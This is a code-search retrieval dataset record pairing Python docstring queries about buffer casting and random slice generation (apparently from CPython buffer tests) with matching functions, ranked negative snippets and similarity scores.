[ "def randitems_from_structure(fmt, t):\n memlen, itemsize, _, _, _, _ = t\n return gen_items(memlen // itemsize, '#' + fmt, 'numpy')", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def lf():\n return random.sample(font_list, 25)", "def gen_items(n, fmt, obj):\n if n == 0:\n return gen_item(fmt, obj)\n lst = [0] * n\n for i in range(n):\n lst[i] = gen_item(fmt, obj)\n return lst", "def gen_items(n, fmt, obj):\n if n == 0:\n return gen_item(fmt, obj)\n lst = [0] * n\n for i in range(n):\n lst[i] = gen_item(fmt, obj)\n return lst", "def sample(f, n):\n entries = list(SeqIO.parse(f, 'fasta'))\n for seqnum in range(n):\n loc = round(random.uniform(0, len(entries) - 1))\n entry = entries[loc] # get index of randomly-selected FASTA entry\n header = '>' + str(seqnum + 1) + '-' + entry.description # header\n print(header + '\\n' + str(entry.seq)) # print-out entire entry", "def randrange_fmt(mode, char, obj):\n x = randrange(*fmtdict[mode][char])\n if char == 'c':\n x = bytes([x])\n if obj == 'numpy' and x == b'\\x00':\n x = b'\\x01'\n if char == '?':\n x = bool(x)\n if char == 'f' or char == 'd':\n x = struct.pack(char, x)\n x = struct.unpack(char, x)[0]\n return x", "def randrange_fmt(mode, char, obj):\n x = randrange(*fmtdict[mode][char])\n if char == 'c':\n x = bytes([x])\n if obj == 'numpy' and x == b'\\x00':\n # http://projects.scipy.org/numpy/ticket/1925\n x = b'\\x01'\n if char == '?':\n x = bool(x)\n if char == 'f' or char == 'd':\n x = struct.pack(char, x)\n x = struct.unpack(char, x)[0]\n return x", "def random_entry(): \n\n files = list_entries()\n return random.choice(files)", "def generate_grid():\n field = []\n three_lst = []\n for three_let in range(0, 3):\n three_lst = []\n for i in range(0, 3):\n three_lst.append(chr(random.randint(97, 122)))\n field.append(three_lst)\n return field", "def fill(l):\n s = ''\n for _ in range(0, l):\n s += \"ACGT\"[randint(0,3)]\n return s", "def make_text(chains, n):\n\n first_key = random.choice(chains.keys(n))\n first_key_values = chains[first_key]\n third_word = random.choice(first_key_values)\n temp_list = [first_key[0], first_key[1], third_word]\n # for item in temp_list\n new_key = (first_key[1], third_word)\n\n while True:\n try:\n new_value = random.choice(chains[new_key])\n temp_list.append(new_value)\n new_first_word = new_key[1]\n new_key = (new_first_word, new_value)\n except KeyError:\n break\n\n text = \" \".join(temp_list)\n return text", "def test_nothing_fits():\n freetimes, _ = free([], 9, 0, 17, 0, day_range, 600)\n fmt_freetime = output_format(freetimes)\n for i in fmt_freetime:\n print(i)\n assert fmt_freetime == []", "def random_names(num):\n return tuple(\n sorted(itertools.islice(utils.iunique(utils.random_strings(1, 3)), num))\n )", "def create_tag_list(faker_obj, num=10):\n fake = faker_obj\n return fake.words(nb=num)", "def random_teampreview(self, battle: AbstractBattle) -> str:\n members = list(range(1, len(battle.team) + 1))\n random.shuffle(members)\n return \"/team \" + \"\".join([str(c) for c in members])", "def formatter(t: tuple):\n s = 'The {} numbers are: ' + '{}, '*(len(t)-1) + '{}'\n return s.format(len(t),*t)", "def generatoze(b):\r\n l = []\r\n for i in range(b):\r\n k = random.randint(0, 100)\r\n l.append(k)\r\n return l", "def generate(count):\n lst = []\n with open('data.txt', 'w+') as f:\n for i in range(0, count):\n st = str(random.random())\n f.write(st+\"\\n\")\n lst.append(st)\n return lst", "def get_random(number):\n s = ''\n for i in xrange(number):\n s = s + str(random.choice(field))\n return s", "def test_multi_template():\n data = []\n data.extend([\"{}_data.json\".format(i) for i in range(50)])\n data.extend([\"{}_log.csv\".format(i) for i in range(50)])\n data.extend([\"filename_{}.py\".format(i) for i in range(50)])\n data.extend([\"stuff_{}.py\".format(i) for i in range(50)])\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def add_random_fields(smali_line):\n for _ in range(u.random_nop_interval()):\n print re.sub(r':', u.get_random(True, 32) + ':', smali_line), # Append", "def getformat(self) -> List[str]:\r\n\r\n if isinstance(self.listaTipos, list) is False:\r\n raise TypeError(f\"{self.listaTipos} has to be a list({type(self.listaTipos)})\")\r\n if len(self.listaTipos) != 10:\r\n raise ValueError(f\"{self.listaTipos} needs to have 10 elements ({len(self.listaTipos)})\")\r\n\r\n saida = []\r\n for _ in self.listaTipos:\r\n saida.append(f\"{_}\")\r\n return saida", "def get_all():\n blocks = []\n for key, block in BLOCKS.iteritems():\n if len(block) != 3:\n raise BlockFormatError\n x, y, z = block\n blocks.append('%s=%.1f,%.1f,%.1f' % (key, x, y, z))\n return '|'.join(blocks)", "def generate_grid() -> List[List[str]]:\r\n list_of_game_letters = []\r\n timed_list = []\r\n letters = [j for j in string.ascii_lowercase]\r\n for i in range(9):\r\n timed_list.append(random.choice(letters))\r\n if len(timed_list) == 3:\r\n list_of_game_letters.append(timed_list)\r\n timed_list = []\r\n return list_of_game_letters", "def generate_a_values() -> List[str]:\n return [\"A_1\", \"A_2\", \"A_3\"]", "def genCharGroup(self):\n alphabet = list('abcdefghijklmnopqrstuvwxyz') #Creates a list of all the alphabet characters\n group = []\n count = 0\n while count != 3: #While the loop total does not equal 3\n i = random.choice(alphabet) #Make a random choice\n alphabet.remove(i) #Remove it from the alphabet\n group.append(i) #And add it to the group array\n count += 1 #Add one to the loop total\n return str(''.join(group)) #Return the string of 3 characters to the user" ]
[ "0.75925416", "0.6998413", "0.6998413", "0.61594206", "0.61594206", "0.5678781", "0.55998796", "0.55998796", "0.5551217", "0.55419385", "0.5459458", "0.5367428", "0.53579396", "0.53160495", "0.5218872", "0.51369077", "0.5077376", "0.5070219", "0.5048697", "0.50483674", "0.50316584", "0.5026513", "0.50077575", "0.4998603", "0.49602845", "0.4956614", "0.49315235", "0.4924074", "0.49030784", "0.48991337" ]
0.7437101
1
Interpret the raw memory of 'exporter' as a list of items with size 'itemsize'. If shape=None, the new structure is assumed to be 1D with n itemsize = bytelen. If shape is given, the usual constraint for contiguous arrays prod(shape) itemsize = bytelen applies. On success, return (items, shape). If the constraints cannot be met, return (None, None). If a chunk of bytes is interpreted as NaN as a result of float conversion, return ('nan', None).
def cast_items(exporter, fmt, itemsize, shape=None): bytelen = exporter.nbytes if shape: if prod(shape) * itemsize != bytelen: return None, shape elif shape == []: if exporter.ndim == 0 or itemsize != bytelen: return None, shape else: n, r = divmod(bytelen, itemsize) shape = [n] if r != 0: return None, shape mem = exporter.tobytes() byteitems = [mem[i:i+itemsize] for i in range(0, len(mem), itemsize)] items = [] for v in byteitems: item = struct.unpack(fmt, v)[0] if item != item: return 'nan', shape items.append(item) return (items, shape) if shape != [] else (items[0], shape)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cast_items(exporter, fmt, itemsize, shape=None):\n bytelen = exporter.nbytes\n if shape:\n if prod(shape) * itemsize != bytelen:\n return None, shape\n elif shape == []:\n if exporter.ndim == 0 or itemsize != bytelen:\n return None, shape\n else:\n n, r = divmod(bytelen, itemsize)\n shape = [n]\n if r != 0:\n return None, shape\n mem = exporter.tobytes()\n byteitems = [mem[i:i + itemsize] for i in range(0, len(mem), itemsize)]\n items = []\n for v in byteitems:\n item = struct.unpack(fmt, v)[0]\n if item != item:\n return 'nan', shape\n items.append(item)\n return (items, shape) if shape != [] else (items[0], shape)", "def to_array(self, dtype=float):\n\n resource_result = resources.assignable_array(self.shape, dtype)\n assignable, allowable, required = resource_result\n\n if not assignable:\n a, b = np.round(np.array([required, allowable]) / 1e9, 1)\n msg = 'Producer will consume {} GB but only {} GB are available'\n raise MemoryError(msg.format(a, b))\n\n return np.concatenate(list(self), axis=self.axis)", "def read_record(self, *dtypes, **kwargs):\n dtype = kwargs.pop('dtype', None)\n if kwargs:\n raise ValueError(\"Unknown keyword arguments {}\".format(tuple(kwargs.keys())))\n\n if dtype is not None:\n dtypes = dtypes + (dtype,)\n elif not dtypes:\n raise ValueError('Must specify at least one dtype')\n\n first_size = self._read_size(eof_ok=True)\n\n dtypes = tuple(np.dtype(dtype) for dtype in dtypes)\n block_size = sum(dtype.itemsize for dtype in dtypes)\n\n num_blocks, remainder = divmod(first_size, block_size)\n if remainder != 0:\n raise ValueError('Size obtained ({0}) is not a multiple of the '\n 'dtypes given ({1}).'.format(first_size, block_size))\n\n if len(dtypes) != 1 and first_size != block_size:\n # Fortran does not write mixed type array items in interleaved order,\n # and it's not possible to guess the sizes of the arrays that were written.\n # The user must specify the exact sizes of each of the arrays.\n raise ValueError('Size obtained ({0}) does not match with the expected '\n 'size ({1}) of multi-item record'.format(first_size, block_size))\n\n data = []\n for dtype in dtypes:\n r = np.fromfile(self._fp, dtype=dtype, count=num_blocks)\n if len(r) != num_blocks:\n raise FortranFormattingError(\n \"End of file in the middle of a record\")\n if dtype.shape != ():\n # Squeeze outmost block dimension for array items\n if num_blocks == 1:\n assert r.shape == (1,) + dtype.shape\n r = r[0]\n\n data.append(r)\n\n second_size = self._read_size()\n if first_size != second_size:\n raise IOError('Sizes do not agree in the header and footer for '\n 'this record - check header dtype')\n\n # Unpack result\n if len(dtypes) == 1:\n return data[0]\n else:\n return tuple(data)", "def to_ndarray(item):\n \n return type(item), sp.array(item, sp.float64, ndmin=1)", "def chunkize_serial(iterable, chunksize, as_numpy=False, dtype=np.float32):\n it = iter(iterable)\n while True:\n if as_numpy:\n # convert each document to a 2d numpy array (~6x faster when transmitting\n # chunk data over the wire, in Pyro)\n wrapped_chunk = [[np.array(doc, dtype=dtype) for doc in itertools.islice(it, int(chunksize))]]\n else:\n wrapped_chunk = [list(itertools.islice(it, int(chunksize)))]\n if not wrapped_chunk[0]:\n break\n # memory opt: wrap the chunk and then pop(), to avoid leaving behind a dangling reference\n yield wrapped_chunk.pop()", "def ndarray_from_structure(items, fmt, t, flags=0):\n memlen, itemsize, ndim, shape, strides, offset = t\n return ndarray(items, shape=shape, strides=strides, format=fmt,\n offset=offset, flags=ND_WRITABLE|flags)", "def ndarray_from_structure(items, fmt, t, flags=0):\n memlen, itemsize, ndim, shape, strides, offset = t\n return ndarray(items, shape=shape, strides=strides, format=fmt, offset=\n offset, flags=ND_WRITABLE | flags)", "def numpy_array_from_structure(items, fmt, t):\n memlen, itemsize, ndim, shape, strides, offset = t\n buf = bytearray(memlen)\n for j, v in enumerate(items):\n struct.pack_into(fmt, buf, j*itemsize, v)\n return numpy_array(buffer=buf, shape=shape, strides=strides,\n dtype=fmt, offset=offset)", "def itemsize(self):\n return self.dtype.base.itemsize", "def itemsize(self):\n return self.dtype.base.itemsize", "def itemsize(self):\n return self.dtype.base.itemsize", "def itemsize(self):\n return self.dtype.base.itemsize", "def numpy_array_from_structure(items, fmt, t):\n memlen, itemsize, ndim, shape, strides, offset = t\n buf = bytearray(memlen)\n for j, v in enumerate(items):\n struct.pack_into(fmt, buf, j * itemsize, v)\n return numpy_array(buffer=buf, shape=shape, strides=strides, dtype=fmt,\n offset=offset)", "def as_buffer(\n cls,\n obj: torch.Tensor,\n counts: Tuple[int] = None,\n displs: Tuple[int] = None,\n is_contiguous: Optional[bool] = None,\n ) -> List[Union[MPI.memory, Tuple[int, int], MPI.Datatype]]:\n squ = False\n if not obj.is_contiguous() and obj.ndim == 1:\n # this makes the math work below this function.\n obj.unsqueeze_(-1)\n squ = True\n\n mpi_type, elements = cls.mpi_type_and_elements_of(obj, counts, displs, is_contiguous)\n mpi_mem = cls.as_mpi_memory(obj)\n if squ:\n # the squeeze happens in the mpi_type_and_elements_of function in the case of a\n # non-contiguous 1D tensor. Squeezing it puts the memory back to where it should be\n obj.squeeze_(-1)\n return [mpi_mem, elements, mpi_type]", "def ShapeToArray(inputgeodf, cellsize, valfield=None, fillval=0):\n extent = inputgeodf.total_bounds\n outshape = (int(round((extent[3] - extent[1]) / cellsize)), int(round((extent[2] - extent[0]) / cellsize)))\n trans = Affine(cellsize, 0, extent[0], 0, -cellsize, extent[3])\n if valfield is None:\n arr = features.rasterize(inputgeodf[inputgeodf.geometry.name], out_shape=outshape, fill=fillval, transform=trans)\n else:\n arr = features.rasterize(tuple(zip(inputgeodf[inputgeodf.geometry.name], inputgeodf[valfield])), out_shape=outshape, fill=fillval, transform=trans)\n return arr, trans, extent", "def _read_data(self):\n return [np.array([]), np.array([])]", "def uncompressed_unpack_from(self, bytes_string, offset=0):\r\n if self.element_type is bool:\r\n bitfield, bitfield_size = self.bitfield_packer.unpack_from(bytes_string, offset)\r\n return self.iterable_cls(bitfield), bitfield_size\r\n\r\n element_count, count_size = self.count_packer.unpack_from(bytes_string, offset)\r\n\r\n element_get_size = self.element_packer.size\r\n element_unpack = self.element_packer.unpack_from\r\n\r\n original_offset = offset\r\n offset += count_size\r\n\r\n # Fixed length unpacking\r\n if not self.is_variable_sized:\r\n data = bytes_string[offset:]\r\n element_size = element_get_size()\r\n partitioned_iterable = partition_iterable(data, element_size, element_count)\r\n elements = self.iterable_cls([element_unpack(x)[0] for x in partitioned_iterable])\r\n return elements, count_size + element_count * element_size\r\n\r\n # Variable length unpacking\r\n add_element = self.__class__.iterable_add\r\n elements = self.iterable_cls()\r\n\r\n for _ in range(element_count):\r\n element, element_size = element_unpack(bytes_string, offset)\r\n add_element(elements, element)\r\n\r\n offset += element_size\r\n\r\n return elements, offset - original_offset", "def _batchify(self, data, align_right=False, include_lengths=False):\n lengths = [x.size(0) for x in data]\n max_length = max(lengths)\n out = data[0].new(len(data), max_length).fill_(neusum.Constants.PAD)\n for i in range(len(data)):\n data_length = data[i].size(0)\n offset = max_length - data_length if align_right else 0\n out[i].narrow(0, offset, data_length).copy_(data[i])\n\n if include_lengths:\n return out, lengths\n else:\n return out", "def provide_data(self):\n return [(k, tuple([self.batch_size] + list(v.shape[1:]))) for k, v in self._data]", "def chunkize_serial(iterable, chunksize, as_numpy=False):\n\n it = iter(iterable)\n while True:\n if as_numpy:\n # convert each document to a 2d numpy array (~6x faster when transmitting\n # chunk data over the wire, in Pyro)\n wrapped_chunk = [[np.array(doc) for doc in itertools.islice(it, int(chunksize))]]\n else:\n wrapped_chunk = [list(itertools.islice(it, int(chunksize)))]\n if not wrapped_chunk[0]:\n break\n # memory opt: wrap the chunk and then pop(), to avoid leaving behind a dangling reference\n yield wrapped_chunk.pop()", "def test_array_as_buffer_ndim(parser):\n doc = parser.parse(b'''[[\n [1.0, 2.0],\n [3.0, 4.0]\n ]]''')\n view = memoryview(doc.as_buffer(of_type='d'))\n assert len(view) == 32", "def get_data(queue, item_count):\n return [loads(queue.get()) for _ in range(item_count)]", "def values_chunked(items, endtype, chunk_dim=10):\n ilengths = [len(x) for x in items]\n n = len(items)\n items = [np.array(x) for x in items]\n if n > chunk_dim:\n p = n - chunk_dim\n q = chunk_dim\n outer = itertools.product(*(items[0:p]))\n else:\n p = 0\n q = n\n\n def outer_iter():\n yield ()\n\n outer = outer_iter()\n\n chunk = np.zeros(\n [np.prod(ilengths[p:]), len(items)], dtype=int).view(endarray)\n chunk.endtype = endtype\n chunk[:, p:] = np.indices(ilengths[p:]).reshape(q, -1).T\n for i in range(p, n):\n chunk[:, i] = items[i][chunk[:, i]]\n for seq in outer:\n chunk[:, :p] = seq\n yield chunk", "def read(self, size):\n if size % self.recordsize != 0:\n raise ValueError(\"Cannot read a non-integer number of records\")\n\n # ensure we do not read beyond end\n size = min(size, len(self.indices) * self.blocksize - self.offset)\n if size <= 0:\n raise EOFError('At end of file in MultiFile.read')\n\n # allocate buffer for MPI read\n z = np.empty(size, dtype=np.int8)\n\n # read one or more pieces\n iz = 0\n while(iz < size):\n block, already_read = divmod(self.offset, self.blocksize)\n fh_size = min(size - iz, self.blocksize - already_read)\n fh_index = self.indices[block]\n if fh_index >= 0:\n z[iz:iz+fh_size] = np.fromstring(self.fh_raw[fh_index]\n .read(fh_size), dtype=z.dtype)\n else:\n z[iz:iz+fh_size] = 0\n self.offset += fh_size\n iz += fh_size\n\n return z", "def strides_from_shape(ndim, shape, itemsize, layout):\n if ndim == 0:\n return ()\n if layout == 'C':\n strides = list(shape[1:]) + [itemsize]\n for i in range(ndim - 2, -1, -1):\n strides[i] *= strides[i + 1]\n else:\n strides = [itemsize] + list(shape[:-1])\n for i in range(1, ndim):\n strides[i] *= strides[i - 1]\n return strides", "def _raw_itemsize(self):\n if _has_unicode_fields(self):\n total_itemsize = 0\n for field in self.dtype.fields.values():\n itemsize = field[0].itemsize\n if field[0].kind == \"U\":\n itemsize = itemsize // 4\n total_itemsize += itemsize\n return total_itemsize\n else:\n # Just return the normal itemsize\n return self.itemsize", "def split(\n items: typing.List[typing.Any],\n sizes: typing.List[float],\n random_state: int = 42,\n stratify: typing.Sequence[typing.Hashable] = None,\n group: typing.Sequence[typing.Hashable] = None,\n preserve: typing.Sequence[typing.Optional[int]] = None,\n) -> typing.Sequence[typing.Any]:\n splits: typing.List[typing.List[typing.Any]] = [[] for _ in range(len(sizes))]\n if group is None:\n group = list(range(len(items)))\n if stratify is None:\n stratify = [0] * len(items)\n if preserve is not None:\n assert len(items) == len(\n preserve\n ), \"When preserve is provided, it must be the same length as items.\"\n for item, preserveIdx in zip(items, preserve):\n if preserveIdx is not None:\n splits[preserveIdx].append(item)\n ideal_counts = [s * len(items) for s in sizes]\n items, stratify, group = [\n [\n entry\n for entry, preserveIdx in zip(current_list, preserve)\n if preserveIdx is None\n ]\n for current_list in [items, stratify, group]\n ]\n if len(items) == 0:\n # There's nothing left to split.\n return splits\n # Rebalance sizes so that we shuffle the remaining\n # items into the splits to try and match the originally\n # desired sizes.\n offsets = [\n max(target - len(split), 0) for split, target in zip(splits, ideal_counts)\n ]\n sizes = [offset / sum(offsets) for offset in offsets]\n assert (\n 0.99 < sum(sizes) < 1.01\n ), f\"The sizes must add up to 1.0 (they added up to {sum(sizes)}).\"\n assert len(group) == len(items), \"group must be the same length as the collection.\"\n assert len(stratify) == len(\n items\n ), \"stratify must be the same length as the collection.\"\n rng = np.random.default_rng(seed=random_state)\n grouped = [\n {**dict(zip([\"idxs\", \"stratifiers\"], zip(*grouper))), \"group\": g}\n for g, grouper in groupby_unsorted(\n list(zip(range(len(stratify)), stratify)),\n key=lambda v: typing.cast(typing.Sequence[typing.Hashable], group)[v[0]],\n )\n ]\n hashes = {\n h: list(g)\n for h, g in groupby_unsorted(\n grouped, key=lambda g: hash(tuple(set(g[\"stratifiers\"])))\n )\n }\n for subgroups in hashes.values():\n for a, u in zip(\n rng.choice(len(sizes), size=len(subgroups), p=sizes),\n subgroups,\n ):\n splits[a].extend(items[idx] for idx in u[\"idxs\"])\n return splits", "def item(self):\n if self.data.shape != ():\n raise RuntimeError(\"Cannot call item on non-scalar type!\")\n return self.data", "def _serialize_data(self) -> Tuple[np.ndarray, np.ndarray]:\n\n def _serialize(data):\n buffer = pickle.dumps(data, protocol=4)\n return np.frombuffer(buffer, dtype=np.uint8)\n\n serialized_data_infos_list = [_serialize(x) for x in self.data_infos]\n address_list = np.asarray([len(x) for x in serialized_data_infos_list],\n dtype=np.int64)\n data_address: np.ndarray = np.cumsum(address_list)\n serialized_data_infos = np.concatenate(serialized_data_infos_list)\n\n return serialized_data_infos, data_address", "def verify_structure(memlen, itemsize, ndim, shape, strides, offset):\n if offset % itemsize:\n return False\n if offset < 0 or offset+itemsize > memlen:\n return False\n if any(v % itemsize for v in strides):\n return False\n\n if ndim <= 0:\n return ndim == 0 and not shape and not strides\n if 0 in shape:\n return True\n\n imin = sum(strides[j]*(shape[j]-1) for j in range(ndim)\n if strides[j] <= 0)\n imax = sum(strides[j]*(shape[j]-1) for j in range(ndim)\n if strides[j] > 0)\n\n return 0 <= offset+imin and offset+imax+itemsize <= memlen" ]
[ "0.77506953", "0.49568605", "0.48241737", "0.48023552", "0.47398067", "0.4713811", "0.47077888", "0.46982223", "0.4669957", "0.4669957", "0.4669957", "0.4669957", "0.46594286", "0.4643557", "0.459365", "0.4521161", "0.45037562", "0.44983464", "0.4494086", "0.4490511", "0.44542786", "0.44342387", "0.44077992", "0.44038826", "0.4376349", "0.4374872", "0.43747061", "0.43722403", "0.437079", "0.43689886" ]
0.77280533
1
Generate random slice for a single dimension of length n. If zero=True, the slices may be empty, otherwise they will be nonempty.
def rslice(n, allow_empty=False): minlen = 0 if allow_empty or n == 0 else 1 slicelen = randrange(minlen, n+1) return randslice_from_slicelen(slicelen, n)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rslice(n, allow_empty=False):\n minlen = 0 if allow_empty or n == 0 else 1\n slicelen = randrange(minlen, n + 1)\n return randslice_from_slicelen(slicelen, n)", "def get_slice(self, n):\n if n == 0:\n return slice(self._lo_atom, self._lo_atom + self._n_atoms)\n raise IndexError(f\"{n} is invalid for a 1 dimension Slice \")", "def rslices(n, allow_empty=False):\n for _ in range(5):\n yield rslice(n, allow_empty)", "def rslices(n, allow_empty=False):\n for _ in range(5):\n yield rslice(n, allow_empty)", "def test_slice_zero_length_dimension(self):\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[...]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n out = dset[:]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n if len(shape) > 1:\n out = dset[:, :1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape[:2], (0, 1))", "def choose(n, a):\n return torch.as_tensor([a[idx] for idx in torch.randperm(len(a))[:n]])", "def test_slice_zero_length_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[...]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n out = dset[:]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n if len(shape) > 1:\n out = dset[:, :1]\n assert isinstance(out, np.ndarray)\n assert out.shape[:2] == (0, 1)", "def n_random_crop(img, height, width, n):\n crops = []\n img_width, img_height = img.shape\n for i in range(n):\n x = np.random.randint(0, img_width - width)\n y = np.random.randint(0, img_height - height)\n crops.append(img[x:x + height, y:y + width])\n return np.array(crops)", "def _sample(self, n=1):\n return [self[i] for i in np.random.choice(self.length, n, replace=False)]", "def randslice_from_shape(ndim, shape):\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n l = shape[n]\n slicelen = randrange(1, l+1) if l > 0 else 0\n lslices[n] = randslice_from_slicelen(slicelen, l)\n rslices[n] = randslice_from_slicelen(slicelen, l)\n return tuple(lslices), tuple(rslices)", "def test_slice_of_length_zero(self):\n for i, shape in enumerate([(3,), (2, 2,), (2, 1, 5)]):\n dset = self.f.create_dataset('x%d'%i, data=np.zeros(shape, int), maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[1:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (0,)+shape[1:])", "def randslice_from_shape(ndim, shape):\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n l = shape[n]\n slicelen = randrange(1, l + 1) if l > 0 else 0\n lslices[n] = randslice_from_slicelen(slicelen, l)\n rslices[n] = randslice_from_slicelen(slicelen, l)\n return tuple(lslices), tuple(rslices)", "def random_slice(l: list, size: int) -> list:\n first = randint(0, len(l) - size)\n return l[first:first+size]", "def genslices(n):\n def range_with_none():\n yield None\n yield from range(-n, n+1)\n\n for t in product(range_with_none(), range_with_none(), range_with_none()):\n s = slice(*t)\n if s.step != 0:\n yield s", "def _select_n(arr, n):\n selection = []\n\n idx = range(0, len(arr))\n for x in range(n):\n if len(idx) == 0:\n break\n i = randint(0, len(idx) - 1)\n selection.append(arr[idx[i]])\n del idx[i]\n\n return selection", "def rand_elem(seq, n=None):\n return map(random.choice, repeat(seq, n) if n is not None else repeat(seq))", "def random(size, nulls=False):\n import numpy as np\n r = np.random.random(size)\n if nulls:\n idx = np.random.randint(0, r.size, size=max(1, r.size//4))\n r[idx] = np.nan\n return r", "def test_slice_of_length_zero(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(3, ), (2, 2, ), (2, 1, 5)]):\n dset = f.create_dataset('x%d'%i, data=np.zeros(shape, np.int32))\n assert dset.shape == shape\n out = dset[1:1]\n assert isinstance(out, np.ndarray)\n assert out.shape == (0,)+shape[1:]", "def sample(num_dims, num_samples):\n samples = np.random.rand(num_samples, num_dims)\n ### TODO: Update with a uniform sampling plan to fill space\n return samples", "def random_board(n):\r\n \r\n return(np.random.randint(0,n-1, size = n))", "def samples_multidimensional_uniform(bounds, points_count):\n dim = len(bounds)\n Z_rand = np.zeros(shape=(points_count, dim))\n for k in range(0,dim):\n Z_rand[:,k] = np.random.uniform(low=bounds[k][0], high=bounds[k][1], size=points_count)\n print('shape: ', Z_rand.shape)\n return Z_rand", "def random(self, n=1):\n # Generate a sample using a Van der Corput sequence per dimension.\n # important to have ``type(bdim) == int`` for performance reason\n sample = [van_der_corput(n, int(bdim), self.num_generated,\n scramble=self.scramble,\n seed=copy.deepcopy(self.seed))\n for bdim in self.base]\n\n self.num_generated += n\n return np.array(sample).T.reshape(n, self.d)", "def sample(self, n):\n idx = np.random.randint(0, len(self.memory), size=n)\n return [self.memory[i] for i in idx]", "def randn(*args):\n dims = list(args)\n assert type(dims[0]) == int\n return params_func(cmd, \"randn\", params=dims, return_type='FloatTensor')", "def randslice_from_slicelen(slicelen, listlen):\n maxstart = listlen - slicelen\n start = randrange(maxstart+1)\n maxstep = (listlen - start) // slicelen if slicelen else 1\n step = randrange(1, maxstep+1)\n stop = start + slicelen * step\n s = slice(start, stop, step)\n _, _, _, control = slice_indices(s, listlen)\n if control != slicelen:\n raise RuntimeError\n return s", "def random_sample(self, n):\n indices = random.sample(xrange(np.shape(self.data)[0]), n)\n table = DataTable(self.data[indices], self.dims, self.legends, self.tags.copy())\n return table", "def randslice_from_slicelen(slicelen, listlen):\n maxstart = listlen - slicelen\n start = randrange(maxstart + 1)\n maxstep = (listlen - start) // slicelen if slicelen else 1\n step = randrange(1, maxstep + 1)\n stop = start + slicelen * step\n s = slice(start, stop, step)\n _, _, _, control = slice_indices(s, listlen)\n if control != slicelen:\n raise RuntimeError\n return s", "def simple_slice():\n examples = [\n benchmark.Example(\n inputs=[\n [[12, 34, 56, 78], [-1, -2, -3, -4]],\n -1,\n ],\n output=[[34, 56], [-2, -3]],\n ),\n ]\n constants = []\n description = 'Slice a tensor'\n target_program = 'in1[:, 1:in2]'\n source = 'handwritten task'\n return benchmark.Benchmark(examples=examples,\n constants=constants,\n description=description,\n target_program=target_program,\n source=source,\n name='simple_slice')", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", "def rand_aligned_slices(maxdim=5, maxshape=16):\n ndim = randrange(1, maxdim + 1)\n minshape = 2\n n = randrange(100)\n if n >= 95:\n minshape = 0\n elif n >= 90:\n minshape = 1\n all_random = True if randrange(100) >= 80 else False\n lshape = [0] * ndim\n rshape = [0] * ndim\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n small = randrange(minshape, maxshape + 1)\n big = randrange(minshape, maxshape + 1)\n if big < small:\n big, small = small, big\n if all_random:\n start = randrange(-small, small + 1)\n stop = randrange(-small, small + 1)\n step = (1, -1)[randrange(2)] * randrange(1, small + 2)\n s_small = slice(start, stop, step)\n _, _, _, slicelen = slice_indices(s_small, small)\n else:\n slicelen = randrange(1, small + 1) if small > 0 else 0\n s_small = randslice_from_slicelen(slicelen, small)\n s_big = randslice_from_slicelen(slicelen, big)\n if randrange(2) == 0:\n rshape[n], lshape[n] = big, small\n rslices[n], lslices[n] = s_big, s_small\n else:\n rshape[n], lshape[n] = small, big\n rslices[n], lslices[n] = s_small, s_big\n return lshape, rshape, tuple(lslices), tuple(rslices)" ]
[ "0.77326006", "0.70148605", "0.6813906", "0.6813906", "0.6412858", "0.63864595", "0.62999004", "0.6264508", "0.61941475", "0.6164201", "0.616065", "0.6156945", "0.6141035", "0.61246413", "0.61231834", "0.605221", "0.60043675", "0.60013884", "0.59873164", "0.5930526", "0.5928254", "0.59057784", "0.5902516", "0.58677346", "0.58563673", "0.5855074", "0.58475477", "0.5841148", "0.5829778", "0.58039653" ]
0.77208936
1
Print ndarray for debugging.
